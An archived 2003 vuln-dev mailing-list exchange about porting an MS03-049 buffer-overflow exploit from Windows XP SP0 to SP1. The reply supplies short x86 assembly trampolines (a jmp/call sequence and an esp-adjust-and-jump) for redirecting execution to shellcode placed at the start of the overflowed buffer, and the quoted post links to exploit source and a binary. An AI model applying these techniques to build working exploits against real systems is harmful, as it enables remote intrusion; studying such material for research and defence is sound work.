Re: ms03-049 exploit xp sp0

["upb" <upb () email ee>]

heya.
the shortest way i know is :
00000000: EB14                         jmps        000000016
00000002: 832C2440                     sub         d,[esp],040 ;"@"
00000006: E8F5FFFFFF                   call        000000000

11 bytes :(
however, if you know that the code will be on stack, you could do like
00000000: 83EC44                       sub         esp,044 ;"D"
00000003: FFE4                         jmp         esp

upb
----- Original Message ----- 
From: "wirepair" <wirepair () roguemail net>
To: <vuln-dev () securityfocus com>
Sent: Wednesday, November 12, 2003 11:03 PM
Subject: ms03-049 exploit xp sp0


> lo all,
> Well I got xp sp0 to execute my code, but sp1 has a different stack
layout. after the return address data only has about 4 or 8
> bytes (I can't remember and i'm too lazy to check because i've been
messing with this for he past 7 hours).
> Since I have 4/8 bytes to work with i'm contemplating doing some sort of
jmp / call and stuff my shellcode in the beginning of the
> buffer instead of tacking it on to the end like my current exploit.
Unfortunately my asm is lacking still and I am unsure about
> the best way of making it jmp/call the address (without nulls and without
hardset stack addresses).
> If you can offer any suggestions I would *greatly* appreciate it.
> Anyways here's my code http://sh0dan.org/files/0349.cpp
> or the exe: http://sh0dan.org/files/0349.exe. Remember this is SP0 only,
sp1 will definitly crash.
> Thanks,
> -wire
> --
> Visit Things From Another World for the best
> comics, movies, toys, collectibles and more.
> http://www.tfaw.com/?qt=wmf